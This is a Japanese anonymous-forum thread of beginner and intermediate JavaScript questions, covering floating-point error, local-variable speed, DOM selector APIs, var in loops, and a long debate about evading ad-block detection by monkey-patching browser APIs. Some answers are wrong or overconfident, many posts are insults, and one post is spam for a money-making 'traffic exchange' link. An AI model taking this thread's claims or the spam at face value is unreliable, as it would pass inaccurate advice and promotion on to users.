2017/01/30(月) 21:32:58.62 ID:???
>>122
> この2つの方法で結果に違いはありますか?

ないよ。たとえイベントリスナを
じっていたとしてもない。

おそらくinnerHTMLを空にしたほうが速いだろう。

だが

「tbodyに追加したtrを削除」という文章をそのままコードに書き下した
$('tbody > tr').remove() が一番可読性が高い
131 :
Name_Not_Found
2017/01/30(月) 22:49:42.55 ID:VseG2LWP
>>126
132 :
2017/01/30(月) 22:50:25.49 ID:???
>>131
荒らしやめてください
133 :
2017/01/30(月) 23:01:51.46 ID:???
>>126,132
荒らし止めてね
134 :
2017/01/30(月) 23:12:43.26 ID:???
>>133
荒らすなよクズ
135 :
2017/01/30(月) 23:27:32.98 ID:???
JavaScriptやる人ってここまでレベル低いんだね
136 :
2017/01/30(月) 23:38:05.76 ID:???
JamaScriptやってるんだろうな
137 :
2017/01/30(月) 23:39:36.29 ID:???
荒らしは>>130だろとマジレス
138 :
2017/01/30(月) 23:40:46.54 ID:???
>>130は有益な内容だから問題ない
139 :
2017/01/30(月) 23:48:58.54 ID:???
>>130はごく普通のjQuery信者
140 :
2017/01/31(火) 01:09:26.80 ID:???
普通でないjQuery信者って何だろう?
141 :
2017/01/31(火) 01:29:01.12 ID:???
jquery信仰を他者に押し付けない謙虚な信者
142 :
2017/01/31(火) 02:06:39.95 ID:???
有益な内容だから問題ない
143 :
2017/01/31(火) 02:14:05.56 ID:???
「偏った評論家」と予めバイアスをかけとけば平和かもな
144 :
2017/01/31(火) 03:10:34.87 ID:???
自分で有益とか言ってて虚しくないのか
145 :
2017/01/31(火) 04:57:47.02 ID:???
>>117
コンピューターの小数点には誤差があるから、正確な値が必要なときは、整数だけを使うこと。
見た目が0.1と表示されていても、実際の値は、0.1じゃない

>Math.round((0.1+0.2)*10)/10
0.1+0.2は、見た目は0.3だが、実際の値は、誤差があるから0.3にはならない

詳しくは、浮動小数点で検索して
146 :
115
2017/01/31(火) 11:42:51.80 ID:EfDZjAHK
>>117
> ちなみに Math.round((0.1+0.2)*10)/10 でも大丈夫ですか?
0.1+0.2 は浮動小数点演算なので結果は保証されません。
誤差が Math.round で吸収できる範囲におさまるかどうかは仕様を読み込まないと分からないので、必要であれば「IEEE754-2008」を解読して下さい。私もそこまで詳しくは知りません。
https://www.csee.umbc.edu/~tsimo1/CMSC455/IEEE-754-2008.pdf
私からいえるのは整数に変換してから演算すれば、扱える整数の最大値(9007199254740991)を超えない限りは誤差がなくなるという事です。
二項演算の和算であれば自動化するのは簡単なので関数化しておけばいいでしょう。
147 :
2017/01/31(火) 12:12:08.48 ID:???
誤差だとか結果は保証されないとか、馬鹿げた言い回しは辞めてほしいね、ほんと
148 :
2017/01/31(火) 13:12:32.65 ID:???
>>145-146を否定するなら「更に良い回答」を自分からすべきだと思う
149 :
Name_Not_Found
2017/01/31(火) 13:16:40.06 ID:RUJB/bUO
しるかバーカ
150 :
2017/01/31(火) 13:54:23.18 ID:???
おい、お前らさあ
JamaScript の質問用スレッドでやってくれよ
151 :
2017/01/31(火) 14:30:58.13 ID:???
無駄な煽りこそ消えてほしいよ
152 :
2017/01/31(火) 14:57:15.97 ID:???
153 :
2017/01/31(火) 18:51:39.54 ID:???
154 :
2017/01/31(火) 19:06:13.88 ID:???
ドメインがもう臭い
155 :
2017/02/01(水) 00:34:10.72 ID:???
1,024は、2**10乗だよな
Math.log2(1024); // 10

MDNにあるポリフィル
Math.log2 = Math.log2 || function(x) {
return Math.log(x) / Math.LN2;
};

このポリフィルでは、分母のMath.LN2は、約0.693〜で誤差があるから、
所々で間違った値を返す

だから、計算に浮動小数点を使ったら、正確な値を返さない
156 :
2017/02/01(水) 02:07:47.92 ID:???
そもそもMath関数の精度事態が保証されていないがな
V8も直近のネイティブ実装になる前はその実装だったし
157 :
2017/02/02(木) 14:32:41.83 ID:???
誤差ではなく有効数字の問題
無理数なんだからどうあがいても誤差は出る
158 :
Name_Not_Found
2017/02/02(木) 18:24:38.01 ID:URN1C2px
初歩的なことかもしれませんが、、

<script>
var start = new Date().getTime();
for (var i = 0; i < 10000000; i++) {}
var end = new Date().getTime();
console.log((end-start) + " ms");
</script>

これだと実行時間が大体25〜30msくらいで、

<script>
var start = new Date().getTime();
addEventListener('DOMContentLoaded', function(){
for (var i = 0; i < 10000000; i++) {}
var end = new Date().getTime();
console.log((end-start) + " ms");
});
</script>

こっちだと14〜20msくらいなんですが、この違いはなぜでしょうか?
159 :
2017/02/02(木) 19:03:51.71 ID:???
わからん
何かしら最適化されている気がする
160 :
2017/02/02(木) 19:37:08.56 ID:???
>>158
前後のHTMLが不明ですね
DOMのリフロー処理が並列して走るから干渉して遅くなっているのでは?
161 :
2017/02/02(木) 19:39:56.04 ID:???
>>160
そのscript要素だけでhtml作って試してみ
162 :
Name_Not_Found
2017/02/02(木) 20:02:29.48 ID:buSUxCye
javascriptって例えばカウントダウンタイマーの作り方を覚えたとして、その後何度かカウントダウンタイマーを作って慣れていくのが正しいんですか?簡単に言うとJAVAscriptで作れるものを一つ一つ覚えていくということです(ここではカウントダウンタイマー)

それともオブジェクト、メソッド、プロパティを覚えてカウントダウンタイマーの作り方を知らない人が考え抜いてカウントダウンタイマーを作るのが正しいんですか?

自分で知らないものを1から作るなんてめちゃくちゃ難しいので一つ一つ覚えていくというやり方でいいのでしょうか?
163 :
2017/02/02(木) 20:25:20.60 ID:???
>>162
まずは何をしたいかを明確にすることが大事
例えば料理だと、作りたいものが無いと食材も調理器具も何を揃えていいのかもわからないだろ。それと同じ

とりあえずwebの場合、DOM操作以外でjsを使う場面はまず無い

タイマーやゲームなど動きのあるものを作りたいなら他の言語を使ったほうが良い
164 :
Name_Not_Found
2017/02/02(木) 20:58:24.99 ID:buSUxCye
ありがとうございます
165 :
2017/02/02(木) 21:18:43.68 ID:???
>>158
ローカル変数使ってるからだろ


オメェら役に立たねぇなぁw
166 :
2017/02/02(木) 21:25:05.06 ID:???
>>165
ローカル変数使うだけでそこまで早くなんのかよwwww
じゃあこれでどやwwwドヤァwwwwww

<script>
(function () {
var start = new Date().getTime();
for (var i = 0; i < 10000000; i++) {}
var end = new Date().getTime();
console.log((end-start) + " ms");
})();
</script>

早くなりましたすいません。
167 :
2017/02/02(木) 21:36:08.40 ID:???
無知なわたくしめに説明してください
168 :
2017/02/02(木) 21:41:36.82 ID:???
jQueryでもlodashの話題でもないからめんどくせぇなぁw
169 :
2017/02/02(木) 21:46:44.12 ID:???
>>167
js ローカル変数 早い とかで検索してみては
http://d.hatena.ne.jp/maachang/20130211/1360569777
内部的に総当りで探してるようなもんと思えば大体合ってるわ

なんでこんな初歩的なこと知らなかったんだろう?
と思ったらそもそもグローバル変数なんて使わないじゃん
170 :
2017/02/02(木) 21:47:55.75 ID:???
>>167
まあいいや。説明してやろう。
こういうことだよ

function a() {
 var i;
 function b() {
  var j;
  function c() {
   var k;
   function e() {
    var l;
    l = 1; // l はどこにあるんだ? 関数eの中にあった!
    i = 1; // i はどこにあるんだ? 関数eの中にない! cの中にない! bの中にない! aの中にあった!
   }
  }
 }
}
171 :
2017/02/03(金) 00:15:05.07 ID:???
それは間違い、CPUキャッシュやレジスタ周りの最適化の影響
172 :
2017/02/03(金) 06:54:12.77 ID:???
つまり単純にローカル変数 == 早いではなく
javascriptを動かしてるエンジンによって変わってくるってことか?
173 :
2017/02/03(金) 08:34:35.21 ID:???
>>162
学習用途でカウントダウンタイマーを作る事は否定しない
カウントダウンタイマーの派生系だけでなくて他の課題にも挑戦した方が良いとは思うが

> 自分で知らないものを1から作るなんてめちゃくちゃ難しいので
最終的にはそのやり方で出来るようにならなければならない
作りたいものに必要な技術を知らなくて調べる事から始める事なんてざらにあるからね
ただ、全くの無知識で始めるととっかかりすらないだろうからある程度の下積みは必要
174 :
2017/02/03(金) 09:05:23.97 ID:???
>>172
理屈ではそうなるだろうけど、現実的にはエンジン自体に差はほとんど無いと思う
175 :
2017/02/03(金) 11:39:08.06 ID:???
毎回処理時間が同じだとは限らない
176 :
2017/02/03(金) 20:03:39.24 ID:???
Javascript学習3日目です
ページのテキスト表示を外部のjsファイルから操作して空白にしろと言われました
表示はphpファイルでやってるみたいです
正直phpもhtmlもよくわかってないレベルです
何か参考になる書籍やサイトがあれば教えていただきたいです
177 :
2017/02/03(金) 20:15:47.10 ID:???
んなもん先生だか先輩だか上司だかに聞け
178 :
2017/02/03(金) 21:58:09.46 ID:???
innerHTMLとかでぐぐればok
179 :
2017/02/03(金) 22:26:37.62 ID:???
3日でマスター HTML5 & CSS3、鳥羽薫、2013

この本が一番簡単。
30ほどのHTML5・CSS3の主要タグが学べる
180 :
2017/02/03(金) 22:33:57.71 ID:???
三日坊主の間違いだろw
181 :
2017/02/03(金) 22:52:46.49 ID:???
三日坊主笑った
いいセンスしてるわ
182 :
2017/02/03(金) 22:53:19.74 ID:???
>>179
jsスレらしい宣伝だ
183 :
2017/02/04(土) 17:09:45.99 ID:???
ブックマークレットを実行するとそのサイトの運営者にどんなコードが実行されたかってわかっちゃいます?
184 :
2017/02/04(土) 17:11:40.74 ID:???
いいえ
185 :
2017/02/04(土) 18:14:56.34 ID:???
ありがとうございました
186 :
2017/02/05(日) 21:25:52.88 ID:???
実はごにょごにょすれば分かることもある
けどそんなことしてる運営者なんていないだろうし気にしないでいいよ
187 :
2017/02/06(月) 04:58:41.55 ID:???
ごにょごにょしてもわからない
188 :
2017/02/07(火) 16:03:31.34 ID:???
JavaScriptでAES暗号化するなら何がオススメですか?
189 :
2017/02/07(火) 16:57:08.91 ID:???
CryptoAPIがあんじゃん
190 :
2017/02/07(火) 17:26:48.04 ID:???
>>189
使ってみたいので詳しくたのみます。
191 :
2017/02/07(火) 17:32:24.32 ID:???
192 :
2017/02/08(水) 08:31:55.58 ID:???
getElementsByClassNameとquerySelectorAllってどうやって使い分ければいいんですか?
193 :
2017/02/08(水) 09:41:09.24 ID:???
>>192
getElementsByClassName('クラス名称')
querySelectorAll('CSSのセレクタ')
194 :
2017/02/08(水) 11:15:14.66 ID:???
>>192
live か not live か
195 :
2017/02/08(水) 22:16:32.27 ID:???
>>192
君の本当の質問は使い分けというより、
querySelectorAllを使えば、getElementsByClassNameはいらないはずなのに
なんでgetElementsByClassNameなんてのが存在しているの? という質問だろうね。

話は簡単で昔はquerySelectorAllがなかったから
もともとgetElementsByClassNameとかはCSS自体がない(もしくは
あったかもしれないが実用レベルではない)時代に作られたものだから
querySelectorAllなんて生まれるはずもなかったんだよね。

そのあとセレクタでDOM要素を取得するというjQueryが登場し、
そのアイデアをパクってできたのがquerySelectorAll

だから機能的に言えばgetElementsByClassNameは使う必要はない
使う理由があるとしたらquerySelectorAllがないブラウザにも対応させるときか
getElementsByClassNameの方が速いかもしれない(測定してないがほぼ0だろう)
ぐらいかな
196 :
2017/02/08(水) 22:44:25.13 ID:???
速度だけでしか物事を測れない人って薄っぺらいな
197 :
2017/02/08(水) 22:55:07.45 ID:???
querySelectorAllなんて最遅だろ
ノードリストが出来上がるまで待ってるんだから
198 :
2017/02/08(水) 23:03:58.53 ID:???
>>196
読んでないのがバレバレw
199 :
2017/02/08(水) 23:04:59.65 ID:???
>>197
getElementsByClassNameで取得できる状態であれば
querySelectorAllでも取得できる
200 :
2017/02/08(水) 23:08:16.90 ID:???
すぐ上で答え出てるのになんでこんなトンチンカンな妄想言えるんだろうな

getElementsByClassNameはリアルタイムに反映される参照を返すから一度取得すればいつまでも使い回せる
querySelectorAllはただヒットしたノードのリストを返すからDOM更新の度に再取得する必要がある
根本的に別物なんだよ
201 :
2017/02/08(水) 23:17:36.01 ID:???
多分、仕様を読んだことがないから意味が分からんかったのだろ
202 :
2017/02/08(水) 23:32:59.07 ID:???
querySelectorAllを使う理由は諸々のデメリットを度外視して
楽だから以外にない
203 :
2017/02/08(水) 23:43:45.81 ID:???
>>197
CSSって最悪なのか?w
204 :
2017/02/09(木) 00:24:29.18 ID:???
getElementsByClassNameと比較して「楽だから」とかアホか
205 :
2017/02/09(木) 03:03:44.49 ID:???
そもそもどっちも使わない
206 :
2017/02/09(木) 03:56:44.72 ID:???
どっちも使わないなら無理に話題に参加しない方がいい
207 :
2017/02/09(木) 04:26:00.39 ID:???
無知を馬鹿にされて恥かいたからって八つ当たりしてんなよ
208 :
2017/02/09(木) 07:57:57.46 ID:???
どっちも使わないjQuery信者も大変だな
209 :
2017/02/09(木) 08:05:23.62 ID:???
www
210 :
2017/02/09(木) 09:31:49.13 ID:???
え・・・?他にjQueryしかないと思ってる・・・?
211 :
Name_Not_Found
2017/02/09(木) 11:51:47.53 ID:qiL8PH0C
質問です
setIntervalでマウス座標を取得したいのですが
eventを使わずにマウス座標を取得する方法はありますか?
212 :
2017/02/09(木) 19:51:57.43 ID:???
>>211
ない
213 :
2017/02/11(土) 14:15:05.73 ID:???
アクセスアップとお小遣い稼ぎの裏技
トラフィックエクスチェンジ
http://tra-chan.jugem.jp/?eid=1
214 :
2017/02/14(火) 14:49:09.18 ID:???
一昔前だとJSで<button>を.click()した時でもマウス座標取得できたなあ
それでウィンドウ外のマウス座標も分かった
今は無理っぽいけど
215 :
2017/02/14(火) 15:02:37.99 ID:???
そもそも、eventで事足りるからね
>>211は設計をこねくり回して変な実装しようとしているように見える
216 :
2017/02/14(火) 16:12:45.22 ID:???
>>211
企画イベントの成功を祈る
217 :
2017/02/16(木) 20:37:35.48 ID:???
jsボックス内の背景色をグラデーションにするやり方がわかりませんわ

cssの以下をjsで処理するにはどんな書式になりますか?
background: linear-gradient(90deg,#000,#fff,);
218 :
2017/02/16(木) 21:20:09.87 ID:???
普通に代入すればいいですわ
document.getElementById("hoge").style.background = "linear-gradient(90deg,#000,#fff)";
219 :
2017/02/16(木) 21:35:05.86 ID:???
帰宅したら試してみます。
ありがとうございます。
220 :
2017/02/17(金) 16:52:20.76 ID:???
中々家に帰れなくて連絡おくれて申し訳ない。
教えて頂いた書式で上手く動作しました。
ありがとうございました。
221 :
2017/02/17(金) 22:08:11.68 ID:???
中川家?
222 :
2017/02/18(土) 18:36:29.86 ID:???
掃除当番表を作っています
それでcssを生成する処理でわからないことがありました

宣言あり
for(i=0;i<指定回数;i++){処理内容};

宣言なし
for(var i=0;i<指定回数;i++){処理内容};

var無しでも動くのですがどちらが正しいですか?
ちなみに自分は小5の初心者です
223 :
2017/02/18(土) 19:08:02.72 ID:???
>>222
どちらも正しいが、Strict Modeでは前者はエラーとなり、後者が推奨される
ちなみにプログラミングに年齢は関係ない
224 :
2017/02/18(土) 19:22:44.29 ID:???
strict modeもあるけど、var書かないと他のループの変数と衝突しかねないから、varは書いた方がいいだろうな
俺も小5の頃にvar書かなかったためにバグで悩んだ記憶がある
225 :
2017/02/18(土) 19:25:29.85 ID:???
俺も小5の頃にクロージャ使いまくってメモリ圧迫してたわ
226 :
2017/02/18(土) 20:01:48.51 ID:???
俺は中2の頃からやってるが、そんな記憶はない
227 :
2017/02/18(土) 20:18:58.28 ID:???
グローバル変数って使う?
228 :
2017/02/18(土) 22:43:34.17 ID:???
対抗意識を燃やした時点で敗者だというのにw
229 :
2017/02/18(土) 23:32:43.30 ID:???
>>227
使わない
230 :
2017/02/19(日) 04:52:02.30 ID:???
>>228
皆ただ実体験を共有してるだけなのにそれを対抗だと認識している痛い敗者は君だけだよ
231 :
2017/02/19(日) 06:25:21.73 ID:???
反応するな同類になるぞ
232 :
2017/02/19(日) 06:31:33.64 ID:???
さすがに釣られすぎなんだよなあ
233 :
2017/02/19(日) 06:39:33.86 ID:???
ネタとして楽しんでるだけじゃね?
234 :
2017/02/19(日) 06:56:26.61 ID:???
スルー出来なかった時点で負け
235 :
2017/02/19(日) 10:33:41.35 ID:???
勝ち負けを自分の価値観で決めつけてるところが子供だよなあ…。
236 :
2017/02/19(日) 11:36:47.83 ID:???
by触ることを我慢できなかった子供
237 :
2017/02/19(日) 11:44:01.91 ID:???
2ch初心者って感じで見てて微笑ましい

>>227
使わない
DOM要素は常にグローバルで宣言されてるようなもんだから、使わないと一貫性をもたせたほうが良い
中途半端に使うとややこしくなる。というかなった

ブラゲとかは知らん
238 :
2017/02/19(日) 17:55:40.92 ID:???
222です
アドバイス助かりました!
for文内にvarをつけることにします
239 :
2017/02/20(月) 21:10:40.31 ID:???
閲覧者がadblockとかの広告ブロックを利用しているかどうかの判定ってできない?
240 :
2017/02/20(月) 22:15:32.04 ID:???
何処かで見たけど
div 1
div ad
div 2
この時、1と2topを調べればそれなりにわかる

ちなみに1%もないので、はっきり言って調べるだけ時間の無駄
abpを広めるサイトでも作ってるならもう少し考えてあげるけど
241 :
2017/02/20(月) 22:37:01.50 ID:???
adblockを使ってることをさとられない方法ってあるかな?
昔そういう機能(自分の中でステルス機能って読んでいたw)を
考えた見たことはある。

例えばadblock使用しているとき特有ののオブジェクトの
存在チェックをされないように名前をユーザーが変更できるとか

広告を消すのではなく、無害なものに置き換えることで
広告の存在チェックを騙すとか

考えては見たけど、adblockチェックをしているような所でも
そのチェックコードのJavaScriptを弾くようにすれば
adblockチェック自体を無効化出来てそれで十分なので
今のところそこまでやる必要性がない
242 :
2017/02/20(月) 23:04:24.35 ID:???
adblockを使ってることをさとられない方法ってあるかな?
今のところそこまでやる必要性がない

〜 完 〜
243 :
2017/02/20(月) 23:14:49.90 ID:???
>>242
ん?何が言いたいのかな?

やる必要性はなくても
やれる力をつけておくことは重要だよ
244 :
2017/02/20(月) 23:18:50.52 ID:???
完璧な方法はないでしょ
いたちごっこだよ
コンピュータウィルスとセキュリティソフトの関係と同じ
245 :
2017/02/20(月) 23:22:44.99 ID:???
>243
adblockを避ける理由がいまいち分からないし、どんな方法であれ避ける方法を避ける方法が開発される
sで、その避ける方法も避ける方法が開発される
phpならまだしもjsだどうしようもない
そこまで頑張る広告なら努力賞として踏んであげたら?

で、
「今のところそこまでやる必要性がない」
にたどり着く
だいたい広告があることでそこまで不便になることもないだろう
むしろそこまでして避けたい理由の方が知りたい
246 :
2017/02/20(月) 23:24:22.17 ID:???
> むしろそこまでして避けたい理由の方が知りたい

ステルス機能の実現だけど?
どこまでクライアント側で書き換えてることを
検出できないようにできるかという話
247 :
2017/02/21(火) 00:33:33.03 ID:???
adblockを使わずに広告を殺せばいい
248 :
2017/02/21(火) 01:54:09.66 ID:???
adb入れてると「adbを無効にして更新してください」って画面全体に出すサイト、ほんとひで。
IE専用サイトと同じぐらいムカつく。
お前のサイトにそこまでする価値はねぇよと言いたい
249 :
2017/02/21(火) 03:59:21.54 ID:???
スクリプト版使えば出ない
250 :
2017/02/21(火) 10:28:51.10 ID:???
>>246
何の為にステルス機能を実現するの?
251 :
2017/02/21(火) 11:04:05.39 ID:???
自分もだけどどうしても対策したい人は追加のUSなり作ってするでしょ。
でもそれをADB標準で入れちゃうといたちごっこが加速するだけだから、
どうしてもな人だけで良いと思うよ
252 :
2017/02/21(火) 12:20:03.70 ID:???
>>250
どこまで隠蔽できるかの技術調査
253 :
2017/02/21(火) 12:28:22.56 ID:???
広告の位置にposition: absoluteで白いdivを重ねたらバレにくいんじゃね
254 :
2017/02/21(火) 12:49:01.98 ID:???
>>252
隠蔽する方法が分かれば発見する事も可能となるので、いたちごっこになるのは避けられない
「どこそこのURLのadblock判定を回避するにはどうすればいいですか」のように具体的になっているならともかく、ただ漠然と「adblockを使っている事を悟られないようにするには」といわれてもね
あえていうなら「方法さえわかれば発見できるので100%不可能」
255 :
2017/02/21(火) 12:56:56.55 ID:???
>>254
たとえばさ、特殊なブラウザを作って、
広告画像の部分を透明画像に置き換えるってことは可能でしょ?
サイト側は表示しているつもりなのに、実際には透明で表示されてる
こんなのは検出不可能でしょ?

ポップアップウインドウでもJavaScriptからは正常に表示している
実際に動いている。ウインドウがそこにある。
だけどユーザーからみれば透明。これも可能だよね?
256 :
2017/02/21(火) 13:19:11.42 ID:???
ぼくのかんがえたさいきょうのブラウザ
257 :
2017/02/21(火) 13:30:41.87 ID:???
>>255
> 広告画像の部分を透明画像に置き換えるってことは可能でしょ?
画像が置き換えられれば、URLも実サイズも変わるのだから検出可能

> だけどユーザーからみれば透明。これも可能だよね?
どうやって透明にしているのア知らんが、CSSでやってるのだろうからJavaScriptで検出可能
258 :
2017/02/21(火) 14:00:34.50 ID:???
255は、広告は表示しないけど広告を表示させているようにJSが嘘をつくブラウザを作ればいいって言ってるんでしょ。
まあこんな暴論が成り立つならテキストブラウザでも使っとけって言いたいがな
259 :
2017/02/21(火) 14:03:17.57 ID:???
透明化だけでいいならユーザースタイルでopacity指定するだけのことじゃん
adblockだって必要に応じて要素指定するんだから手間は変わらん
260 :
2017/02/21(火) 14:24:47.65 ID:???
>>257
JavaScriptで検出する時にニセの値を返すようにするって方法があるだろ?
261 :
2017/02/21(火) 14:28:28.76 ID:???
>>257
> 画像が置き換えられれば、URLも実サイズも変わるのだから検出可能
URLは間にプロキシを挟むことで同じURLのまま違う画像を返したことはあるよ
その延長で同じサイズの透明画像を返すこともできるだろう
262 :
2017/02/21(火) 14:29:23.10 ID:???
ComputedStyleを読み取ればopacityも判定可能
>>258のいうようにJavaScriptエンジンを自作すれば、判定不可能にはなるな
実DOMと外向きのDOMが異なる動作にすると致命的なバグを引き起こしそうで怖いが、やる気があるならやってみたらいいんじゃないかね
263 :
2017/02/21(火) 14:31:10.15 ID:???
>>260
では、ComputedStyleをどうやって誤魔化すのかいってみろ
264 :
2017/02/21(火) 14:35:42.51 ID:???
window.getComputedStyle = function() {いろいろ}

こんな感じでできるだろw
265 :
2017/02/21(火) 14:37:57.65 ID:???
>>261
それはもうadblockのブラウザ拡張の範囲を超えているんじゃないかね
(>255の特殊なブラウザも荒唐無稽な話ではあるが…、本当に技術力を持っているなら聞くまでもなくやっているだろうに)
Local Proxyを使って書き換えれば確かにあなたのいう挙動は実現できる
ならば、canvasを使って対象の画像を読み込めば透明色を判定できるのでは?
266 :
2017/02/21(火) 14:40:29.57 ID:???
>>264
君の知識はその程度か
window を得る方法はいくらでもある

グローバルコードの this
document.defaultView
Function('return this')();
(0,eval)('this')
267 :
2017/02/21(火) 14:41:23.75 ID:???
>>265
突き詰めればブラウザのレンダリング部分を置き換えることになるだろうね。

ヘッドレスブラウザが実際には画面には何も描画していないのと同じように
JavaScriptからは描画しているつもりだけど何も表示されない。

究極的にはアンチ広告専用のブラウザを作ることには
なるだろうとは思ってるよ。
268 :
2017/02/21(火) 14:42:19.96 ID:???
>>226
いやw
本物のwindowオブジェクトのメソッドを置き換えてるんだから
本物のwindowオブジェクトの取得方法を変えても意味ないってw
269 :
2017/02/21(火) 14:45:08.11 ID:???
>266は間違えだった
DOMParserやiframeを使って新しいwindowを作成すれば正規のgetComputedStyleを参照できるな
270 :
2017/02/21(火) 14:47:13.72 ID:???
>>267
完全にスレ違いだからブラウザ開発スレでも作ってそっちでやってくれ
271 :
2017/02/21(火) 14:48:45.83 ID:???
>>269
DOMParserやiframeを使って新しいwindowを作成する
関数も置き換えることになりそうだな
272 :
2017/02/21(火) 14:50:37.45 ID:???
>>271
何をどう書き換えるのか具体的にいってみろ
273 :
2017/02/21(火) 14:52:35.29 ID:???
https://developer.mozilla.org/ja/docs/Web/API/MutationObserver
> MutationObserver とは、指定したコールバック関数を DOM の変更時に
> 実行させる API です。この API は、DOM3 Events の仕様で定義されていた
> Mutation Events を新しく設計し直したものです。

これとかもステルス機能に利用できないかなーって思ってるよ。
274 :
2017/02/21(火) 14:54:06.25 ID:???
>>272
新しくwindowを作成する関数を置き換えて
windowを作成した後に動的にパッチを当てるとかね。

こういうのってウイルスとかプロテクト関連の
技術でよく使われるよ
275 :
2017/02/21(火) 15:27:55.03 ID:???
では、予め書き換え不可能なようにしておけば防止できるな
276 :
2017/02/21(火) 15:40:15.39 ID:???
「ぼくのかんがえたさいきょうのステルス機能」はもういい
自分で考えた仕組みがあるなら質問する前に実践してから悩め
せめて、実物を作ってコードを見せてから質問しろよ
「机上の空論」は時間の無駄
277 :
2017/02/21(火) 15:51:09.99 ID:???
>>276
どうしたの?
278 :
2017/02/21(火) 16:12:08.62 ID:???
>>275
どうやって?
279 :
2017/02/21(火) 16:20:30.10 ID:???
>>278
Object.defineProperty
280 :
2017/02/21(火) 16:21:12.08 ID:???
>>277
何が?
281 :
2017/02/21(火) 17:26:15.39 ID:???
window生成の方法は他にもいくつかあるわけで全てのAPIを監視してwindow生成する度に書き換えるのは現実的じゃない
そもそも、getComputedStyleを変数にキャッシュされていたらどうしようもない
MutationObserverを使えば広告が書き換えられたことも監視できる
282 :
2017/02/21(火) 20:12:51.18 ID:???
ではそのMutationObserverそのものを先に置き換えればいいな
283 :
2017/02/21(火) 20:13:44.67 ID:???
>>279
Object.definePropertyを置き換えればいいな
284 :
2017/02/21(火) 20:14:09.56 ID:???
> window生成の方法は他にもいくつかあるわけで全てのAPIを監視してwindow生成する度に書き換えるのは現実的じゃない

十分現実的
285 :
2017/02/21(火) 22:01:51.41 ID:???
jsの話題からそれた輩がおるな
286 :
2017/02/21(火) 22:15:43.93 ID:???
>>283
Object.definePropertyを書き換え不可能にされたら終わりだろ
変数に関数をキャッシュされても終わり
今までの指摘でその発想に至らないようでは君には無理じゃないかね
287 :
2017/02/22(水) 01:07:31.56 ID:???
> Object.definePropertyを書き換え不可能にされたら終わりだろ

どうやって書き換え不可能にするの?

書き換え不可能にする前に先手を打つって話をしてるのに
288 :
2017/02/22(水) 01:08:21.65 ID:???
> 変数に関数をキャッシュされても終わり

変数にパッチ当て済みの関数を
キャッシュしちゃうわけですねw
289 :
2017/02/22(水) 07:51:39.13 ID:???
全てのサイトであらゆるメソッドを完璧に監視できるんなら確かに可能でしょ。
でもそれは現実的に無理。
それよりはネイティブでNN使ってレンダリングツリー食わせて学習させんだと言う方がまだ見込みがある。

広告が嫌と言っても、コンテンツと無関係で派手な広告が気に食わないだけだろうからで、
自作のブロッカー書いて自分が回るサイト内でadbとは別軸で簡単に適応させてしていくのが最も現実的だよ。
完全対策は不可能だけど、そもそも広告が嫌と言っても画像や音声や映像などで
コンテンツと融合したものはかなり困難だしね。
290 :
2017/02/22(水) 07:54:01.89 ID:???
あんまり堂々といたちごっこを加速すべきじゃない。
お互いが大変になっていくだけだからね。
例えばnew Realmを使った駆け引きとか、難しくなると思うけどなぁ。
291 :
2017/02/22(水) 07:58:34.78 ID:???
abp使うなってサイトでは素直に切るかな
abpモドキを作って回避することはできるけど、労力が大きすぎんよ〜
292 :
2017/02/22(水) 08:35:35.45 ID:???
まあオーバーレイタイプであればもどきを作らなくても
要素を検証→Delキー で大体の場合終了だわな
ページ遷移タイプは超簡単なUSで対応可能
293 :
2017/02/22(水) 10:24:43.12 ID:???
すいません、既に動作している他サイトのjavascriptへの対策についての質問は大丈夫でしょうか。
ブラウザで該当サイト閲覧時、強制スクロールが発生してしまうのですが
この部分のjavascriptだけをピンポイントで無効にする方法はないのでしょうか。
294 :
2017/02/22(水) 11:57:19.02 ID:???
物による
関数単位で簡単に無効にすれば済むような設計なら話は早いが
295 :
2017/02/22(水) 12:22:36.63 ID:???
あまりにうざいのは出てからブックマークレットで消してるわ。
広告屋で学生時代バイトした経験から言うと、広告を見たくないから広告が手元にこないようにする、ってのは最悪手。
広告屋は収益が無くなるので、意地でも手元に広告を届けるようになる&単価の高い広告になる。多分ネットだとそれが≒エロ、グレーゾーンなんだと思う。

届いた事にするのが一番エスカレートしない。
そうしとかないと星新一の賑やかな未来になってしまうと思ってたけど、なりつつあるのが末恐ろしい。
296 :
2017/02/22(水) 18:41:22.16 ID:???
クリックしてもらわんと金にならんのだが
297 :
2017/02/22(水) 19:22:42.85 ID:???
>>296
そうなって居ない時代もあったのよ。枠に値段つけて、時間やビュー割合で売るやつ。
そうしてるうちに、枠の転売する奴が出て来たり、素人が自分で適当な中身のないサイトにベタベタ貼って、事実上枠の価値をゼロに近づけた。
だから、枠では無くて、有効枠数という意味でのクリック率で金取ってたけど、それでも枠の価値が下がりすぎてらもう率では計上出来なくなって、
クリック数で金とった。
そしたら、自分のページに貼り付けて、自分で色んなプロキシ使って踏み倒したり、リファラ攻撃でとにかくクリックさせるようにした。
もうクリック数も無意味な数字になったので、有効クリック数という意味で、アフィリエイトって形が始まった。
それも自爆やら収益率やらなんやらという形で死んで、今は大手サイトが自社で金使ってコンテンツ作って、財源に広告費をあて、その枠を売るという形で元に戻ったが、その代わりに絶対に見せるという方法で広告枠を死守するようになった。

CMカットの方法が良くなったり、配信形態が増えるにつれて、テレビCMが長くなったのと同じ。
全部そんな負の連鎖。
しかも何周かしてる。俺は1周目終わりぐらいまでしか居なかったけど、残ってる人に聞いたらやっぱそう。
298 :
2017/02/22(水) 19:26:23.44 ID:???
でもやっぱ消すよなw
299 :
2017/02/22(水) 19:35:51.27 ID:???
まぁ、ぶっちゃけ俺もdisplay:noneかける。
300 :
2017/02/23(木) 00:24:23.68 ID:???
星新一じゃないじゃん!

要は広告そのものが死ねばいいのに
301 :
2017/02/23(木) 00:33:16.95 ID:???
そうだね。
全部有料コンテンツのサイトになれば、広告もなくなって解決だね。
302 :
2017/02/23(木) 00:38:46.68 ID:???
>>300
ごめん、筒井康隆だったw
広告が死んだら普通の人は今考える常識的な値段で物買えなくなるよ。
ただで見れないどころか。
広告は適切なものが適切な形で出れば悪いもんじゃないと思ってるけどな。
YouTubeの広告とか飛ばせるのにたまに見ちゃうじゃん。ああいうの。
303 :
2017/02/23(木) 00:57:05.91 ID:???
>>301
> 全部有料コンテンツのサイトになれば、広告もなくなって解決だね。
そうあるべきなんだよね。
本当に価値があるものに金を払うべき

>>302
> YouTubeの広告とか飛ばせるのにたまに見ちゃうじゃん。ああいうの。
いや、俺飛ばしてるけど

最近はYouTubeの下とかに出る広告も消してるし。
FlashじゃなくてHTML5になったお陰で消しやすくなった



